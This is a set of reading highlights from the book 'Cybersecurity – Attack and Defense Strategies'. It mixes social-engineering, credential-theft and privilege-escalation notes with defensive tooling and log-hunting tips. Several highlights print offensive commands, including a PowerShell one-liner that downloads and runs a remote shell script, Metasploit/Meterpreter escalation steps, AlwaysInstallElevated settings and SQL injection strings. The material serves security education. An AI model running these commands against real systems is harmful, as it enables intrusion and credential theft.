# Cybersecurity – Attack and Defense Strategies  ## Metadata - Author: [[Yuri Diogenes, Erdal Ozkaya]] - Full Title: Cybersecurity – Attack and Defense Strategies - Category: #books ## Highlights - many are not prepared to handle security incidents in a cloud environment. ([Location 668](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=668)) - A confident hacker could even request network information and statistics from the IT department using the identity of a high-ranking employee. ([Location 1350](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1350)) - Humans are sympathetic, trusting of friends, show-offs, and obedient to higher authorities; they are easy to convince provided that one can bring them around to a certain way of thinking. There are six levers that social engineers use to get victims to talk. One of these is reciprocation, where a victim does something for a social media user who in turn feels the need to reciprocate the favor. It is part of human nature to feel obligated to return a favor to a person, and attackers have come to know and exploit this. Another lever is scarcity, where a social engineer will get compliance from a target by threatening a short supply of something that the target is in need of. It could be a trip, a mega sale, or a new release of products. A lot of work is done to find out a target's likes in order to enable social engineers to pull this lever. The next lever is consistency, whereby humans tend to honor promises or get used to the usual flow of events. When an organization always orders and receives IT consumables from a certain vendor, it is very easy for attackers to clone the vendor and deliver malware-infected electronics. Another lever is liking, whereby humans are more likely to comply with the requests of people they like or those that appear attractive. Social engineers are experts at making themselves sound and appear attractive to easily win the compliance of targets. A commonly used lever that has a high success rate is authority. Generally, humans are obedient to the authority of those that are ranked above them; they can therefore easily bend the rules for them and grant their wishes even if they seem malicious. ([Location 1359](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1359)) - The last lever is social validation: humans will readily comply and do something if other people are doing the same, as they do not want to appear the odd one out. All a hacker needs to do is make something appear normal and then request an unsuspicious user to do the same. ([Location 1373](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1373)) - Tags: [[pink]] - To get passwords, one needs to filter the data captured to show only the POST data. ([Location 1515](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1515)) - Tags: [[pink]] - Predictions are that unless organizations pay attention to the integrity of their data, data manipulation attacks will increase rapidly. ([Location 1715](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1715)) - Tags: [[pink]] - in September 2017, zero-day vulnerabilities were discovered. One of these was BlueBorne, which can take over any Bluetooth-enabled device and infect it with malware. ([Location 1756](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1756)) - Tags: [[pink]] - hackers can use tools, such as Shelter, to verify their phishing resources: ([Location 1830](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1830)) - Tags: [[pink]] - Another approach is to use specific tools to identify vulnerabilities in the code, and Checkmarx (www.checkmarx.com) is an example of that. Checkmarx can scan the code and quickly identify, categorize, and suggest countermeasures for vulnerabilities in the code. The following figure shows a screenshot of the IDA PRO tool. In the screenshot, the tool has already identified 25 SQL injection vulnerabilities and two stored XSS vulnerabilities in the supplied code: ([Location 1857](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1857)) - Tags: [[pink]] - This technique uses a freely available tool called Ophcrack that is used to recover Windows passwords. The tool is free to download but is as effective as the premium versions of Konboot and Hiren's boot. ([Location 1984](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=1984)) - Tags: [[pink]] - To execute an SQL injection attack, a hacker needs to create a valid SQL script and enter it in any input field. Common examples include "or "1"="1 and " or "a"="a, which fool the SQL codes running in the backend. ([Location 2025](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2025)) - Tags: [[pink]] - You can view more examples of XSS attacks at excess-xss.com. ([Location 2039](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2039)) - Tags: [[pink]] - The Security Accounts Manager (SAM) database ([Location 2207](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2207)) - Tags: [[orange]] - The Local Security Authority Subsystem (LSASS) process memory The Domain Active Directory Database (domain controllers only) The Credential Manager (CredMan) store The Local Security Authority (LSA) secrets in the registry ([Location 2208](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2208)) - Tags: [[orange]] - As a member of the Red Team, you may also need to pursue attacks against the hypervisor (VMWare or Hyper-V). For this type of attack, you can use PowerMemory (https://github.com/giMini/PowerMemory/) to exploit the VM's passwords. ([Location 2317](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2317)) - Tags: [[pink]] - To prevent the scan from happening, an organization can opt to have host-based intrusion detection systems, but most network administrators will not consider doing that in a network, especially if the number of hosts is huge. ([Location 2385](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2385)) - Tags: [[pink]] - It directly loads a PS1 file from the internet instead of downloading then loading: PS > IEX (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1') ([Location 2402](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2402)) - Tags: [[pink]] - The following command is going to fork Netcat (https://github.com/diegocr/netcat) into a valid Windows utility called Calculator (calc.exe) and change the filename (nc.exe) to svchost.exe. This way the process name won't raise any flags since it is part of the system: If you simply use the dir command to list all files in this folder, you won't see the file. However, if you use the streams tool from Sysinternals, you will be able to see the entire name as follows: ([Location 2407](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2407)) - Tags: [[orange]] - Psexec \remotecomputername -c autorunsc.exe -accepteula ([Location 2466](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2466)) - Tags: [[pink]] - Another option is to use the PowerShell utility, Nishang (https://github.com/samratashok/nishang). Just as we mentioned previously, you can also use ADS here to hide files, in this case, you can use the Invoke-ADSBackdoor command. ([Location 2498](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2498)) - Tags: [[pink]] - There are several hacking-and security-oriented PowerShell modules being used today. The most common ones are PowerSploit and Nishang. ([Location 2533](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2533)) - The main difference between WMImplant and other remote access tools such as Meterpreter is that it runs natively on a Windows system while the others have to be loaded on a computer first. ([Location 2557](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2557)) - Tags: [[pink]] - Scheduled tasks are not just used for timing the executions of tasks. Hackers also use them to execute tasks with SYSTEM user privileges. ([Location 2561](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2561)) - Tags: [[pink]] - Besides the examples that were given in Chapter 6, Chasing User's Identity you can also use the PowerShell utility Nishang to harvest all local account password hashes with the Get-PassHashes command. ([Location 2582](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2582)) - Tags: [[pink]] - Find-PSServiceAccounts -Forest ([Location 2605](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2605)) - Tags: [[pink]] - Another approach is to attack AD by exploiting the vulnerability MS14-068 (9). Although this vulnerability is old (November 2014), it is very powerful since it allows a user with a valid domain account to obtain administrator privileges by creating a forged privilege account certificate (PAC) that contains the administrator account membership, inside a ticket request (TG_REQ) sent to the key distribution center (KDC). ([Location 2609](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2609)) - Tags: [[pink]] - Nessus and Nmap. After identifying the unpatched machines, hackers can search for exploits from Kali Linux that can be used to exploit them. Searchsploit will contain the corresponding exploits that can be used against unpatched computers. Once the exploits are found, the attacker will compromise the system. The attacker will then use a tool called PowerUp to bypass Windows privilege management and upgrade the user on the vulnerable machine to an admin. If the attacker wants to avoid using scanning tools to verify the current system state, including patches, it is possible to use a WMI command-line tool called wmic to retrieve the list of updates installed, as shown as follows: Another option is to use the PowerShell command get-hotix: ([Location 2748](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2748)) - Tags: [[pink]] - Access token manipulation occurs when attackers cleverly copy access tokens from existing processes using built-in Windows API functions. They specifically target the processes that are started by admin users in a machine. ([Location 2763](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2763)) - Tags: [[pink]] - Metasploit also has a payload called The Cobalt Strike that also takes advantage of token stealing. ([Location 2772](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2772)) - Tags: [[pink]] - These features include; the magnifier, screen keyboard, display switch, and narrator. These features are conveniently placed on the Windows login screen so that they can be supportive to the user from the instant that he/she logs in. However, ([Location 2778](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2778)) - Tags: [[pink]] - Without admin privileges, the shims cannot modify the kernel. However, attackers have been able to create custom shims that can bypass user account control, inject DLLs into running processes, and meddle with memory addresses. These shims can enable an attacker to run their own malicious programs with elevated privileges. They can also be used to turn off security software, especially the Windows Defender. ([Location 2800](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2800)) - Tags: [[pink]] - For instance, rundl32.exe is used to load a custom DLL that loads a COM object that has elevated privileges. This performs file operations even in protected directories that would normally require a user to have elevated access. This opens the UAC mechanism to compromise from knowledgeable attackers. The same processes used to allow Windows programs to run unauthenticated can allow malicious software to run with admin access in the same way. Attackers can inject a malicious process into a trusted process and thereby gain the advantage of running the malicious processes with admin privileges without having to prompt a user. There are other ways that black hats have discovered that can be used to bypass UAC. There have been many methods published on GitHub that can potentially be used against UAC. One of these is eventvwr.exe, which can be compromised since it is normally auto-elevated when it runs and can, therefore, be injected with specific binary codes or scripts. ([Location 2828](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2828)) - Tags: [[pink]] - bypass UAC in Windows 7, you can also use the uacscript, which you can download from https://github.com/Vozzie/uacscript. ([Location 2838](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2838)) - Tags: [[pink]] - There has recently been a discovery of a rather sophisticated DLL injection technique called reflective DLL injection ([Location 2845](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2845)) - Tags: [[pink]] - classic example of that is the use of the registry key AlwaysInstallElevated, which is present in the system (set to 1) and will allow the installation of a Windows Installer package with elevated (system) privileges. For this key to be considered enabled, the following values should be set to 1: [HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller] "AlwaysInstallElevated"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] "AlwaysInstallElevated"=dword:00000001 ([Location 2893](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2893)) - Tags: [[pink]] - user consent is required and if it is not given, the privilege escalation attempt is not successful. Therefore, the attacker has to request the user to allow for the running of a legitimate program and this is where PowerShell comes in. Attackers, therefore, have to set the ask technique to be through PowerShell. This is done as follows: Msf exploit(ask)> set TECHNIQUE PSH Msf exploit(ask)> run At this point, a popup will appear on the target user's screen prompting them to allow the running of PowerShell, a completely legitimate Windows program. In most instances, the user will click OK. With this permission, the attacker can use Powershell to migrate from being a normal user to a system user, as follows: Meterpreter> migrate 1340 Thus, 1340 is listed as a system user on Metasploit. When this is successful, the attackers will have successfully acquired more privileges. A check on the privileges the attackers have should show that they have both admin and system rights. However, the 1340 admin user only has four Windows privileges and these are insufficient to perform a big attack. An attacker has to escalate his or her privileges further so as to have sufficient privileges to be able to perform more malicious actions. The attackers can then migrate to 3772 which is an NT AuthoritySystem user. This can be carried out using the following command:  Meterpreter> migrate 3772 ([Location 2932](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=2932)) - Tags: [[blue]] - If you are unsure about the current state of your security policies, you should perform an initial assessment using the PowerShell command Get-GPOReport to export all policies to an HTML file. Make sure that you run the following command from a domain controller: PS C:> Import-Module GroupPolicy PS C:> Get-GPOReport -All -ReportType HTML -Path .GPO.html ([Location 3086](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3086)) - Tags: [[pink]] - Another tool that you can also use to perform this assessment is the policy viewer, part of the Microsoft Security Compliance Toolkit, available at https://www.microsoft.com/en-us/download/details.aspx?id=55319: ([Location 3093](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3093)) - Tags: [[pink]] - To whitelist apps in an Apple OS, you can use Gatekeeper (https://support.apple.com/en-us/HT202491), and in a Linux OS you can use SELinux. ([Location 3118](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3118)) - Tags: [[pink]] - To optimize your deployment, you should also consider using security baselines. This can assist you in better managing not only the security aspect of the computer, but also its compliance with company policy. For the Windows platform, you can use the Microsoft Security Compliance Manager: ([Location 3123](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3123)) - Tags: [[pink]] - Both tools (Azure Security Center and OMS Security) are available for Windows and Linux, for VMs in Azure or Amazon AWS, and for on-premises computers. ([Location 3175](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3175)) - Tags: [[pink]] - The whole idea behind the defense in depth approach is to ensure that you have multiple layers of protection, and that each layer will have its own set of security controls, which will end up delaying the attack, and that the sensors available in each layer will alert you to whether or not something is happening. In other words, breaking the attack kill chain before the mission is fully executed. ([Location 3225](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3225)) - Tags: [[pink]] - If you are using Catalyst 4500, make sure that you enable dynamic ARP inspection. This feature protects the network from certain "man-in-the-middle" attacks. For more information about this feature, go to https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst4500/12-2/25ew/configuration/guide/conf/dynarp.html. ([Location 3300](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3300)) - Tags: [[pink]] - You can sign up with OpenIOC (http://openioc.org) to retrieve information regarding new IoC and also contribute to the community. By using their IoC Editor (consult the reference section for the URL to download this tool), you can create your own IoC or you can review an existing IoC. The example that follows shows the IoC Editor showing the DUQU Trojan IoC: ([Location 3453](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3453)) - Tags: [[pink]] - The advantage of using an open source NIPS, such as Snort, is that when a new threat is available in the wild, the community usually responds pretty fast with with a new rule to detect the threat. ([Location 3509](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3509)) - Tags: [[pink]] - The Microsoft ATA that was used in the examples explained in the previous section requires that you use port mirroring with the domain controller (DC). ATA will have no impact in the network bandwidth since it will be only listening to the DC traffic. ([Location 3557](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3557)) - Tags: [[pink]] - The reason we are using Azure Security Center to monitor hybrid environment is because the Security Center agent can be installed on a computer (Windows or Linux) on-premises, in a VM running in Azure, or in AWS. This ([Location 3574](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3574)) - Tags: [[pink]] - it is paramount to have a command line logging tool. ([Location 3595](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3595)) - Tags: [[pink]] - you can't think of threat intelligence as an IT security tool—it goes beyond that. You have to think of threat intelligence as a tool to help make decisions regarding the organization's defense, help managers to decide how they should invest in security, and help CISOs to rationalize the situation with top executives. ([Location 3689](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3689)) - Tags: [[pink]] - You can start consuming threat intelligence by consuming TI feeds. OPSWAT Metadefender Cloud TI feeds have a variety of options that range from free to paid versions, and they can be delivered in four different formats: JSON, CSV, RSS, and Bro. ([Location 3697](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3697)) - Tags: [[pink]] - Another option for a quick verification is the website https://fraudguard.io. You can perform a quick IP validation to obtain threat intel from that location. ([Location 3701](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3701)) - Tags: [[pink]] - You also can integrate threat intelligence feeds into your Linux system by using the Critical Stack Intel Feed (https://intel.criticalstack.com/), which integrates with The Bro Network Security Monitor (https://www.bro.org/). ([Location 3710](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3710)) - Tags: [[pink]] - Visit this GitHub location for a list of free tools, including free threat intel: https://github.com/hslatman/awesome-threat-intelligence. ([Location 3715](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3715)) - Tags: [[pink]] - In scenarios where the incident response team is unsure about whether a specific file is malicious or not, you can also submit it for analysis at https://malwr.com. ([Location 3717](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3717)) - Tags: [[pink]] - The Microsoft Threat Intelligence Center, which aggregates data from: Honeypots, malicious IP addresses, botnets, and malware detonation feeds Third-party sources (threat intelligence feeds) Human-based observation and intelligence collection Intelligence coming from consumption of their service Intelligence feeds generated by Microsoft and third parties Microsoft integrates the result of this threat intelligence into its products, such as Windows Defender Advanced Threat Protection, Azure Security Center, Office 365 Threat Intelligence, Cloud App Security, and others. ([Location 3745](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3745)) - Tags: [[orange]] - At the end of the investigation, you must answer at least the following questions: Which systems were compromised? Where did the attack start? Which user account was used to start the attack? Did it move laterally? If it did, what were the systems involved in this movement? Did it escalate privilege? If it did, which privilege account was compromised? Did it try to communicate with command and control? If it did, was it successful? If it was, did it download anything from there? If it was, did it send anything to there? Did it try to clear evidence? If it did, was it successful? ([Location 3786](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3786)) - Tags: [[pink]] - Open Source Threat Intelligence https://www.sans.org/summit-archives/file/summit-archive-1493741141.pdf ([Location 3823](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3823)) - Tags: [[pink]] - ProcDump tool is commonly used by attackers to dump the credentials from the lsass.exe process. ([Location 3984](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=3984)) - Tags: [[pink]] - mailing lists. The most recommendable tool for this step, which is from Symantec, provides periodic publications to the users in an organization to keep them updated about global cybersecurity incidents. ([Location 4659](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4659)) - Tags: [[pink]] - The Nessus vulnerability scanner products are annual subscription-based products. Luckily, the home version is free of charge, and it also offers plenty of tools to help explore your home network. ([Location 4732](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4732)) - Tags: [[pink]] - The Secunia Personal Software Inspector (PSI) is a free security tool that identifies vulnerabilities in non-Microsoft (third-party) systems. ([Location 4794](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4794)) - Tags: [[pink]] - To parse Windows Prefetch files, use this Python script at //github.com/PoorBillionaire/Windows-Prefetch-Parser. ([Location 4899](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=4899)) - Tags: [[pink]] - When reviewing the IIS log, pay close attention to the cs-uri-query and sc-status fields. These fields will show details about the HTTP requests that were performed. If you use Log Parser, you can perform a query against the log file to quickly identify if the system experienced a SQL injection attack. Here is an example: logparser.exe -i:iisw3c -o:Datagrid -rtp:100 "select date, time, c-ip, cs-uri-stem, cs-uri-query, time-taken, sc-status from C:wwwlogsW3SVCXXXexTEST*.log where cs-uri-query like '%CAST%'". ([Location 5001](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=5001)) - Tags: [[pink]] - If you are looking for a particular record, you can also use the cat command in Linux, as follows: #cat /var/log/apache2/access.log | grep -E "CAST"   Another alternative is to use apache-scalp tool, which you can download from https://code.google.com/archive/p/apache-scalp. ([Location 5016](https://readwise.io/to_kindle?action=open&asin=B0751FTY5B&location=5016)) - Tags: [[pink]]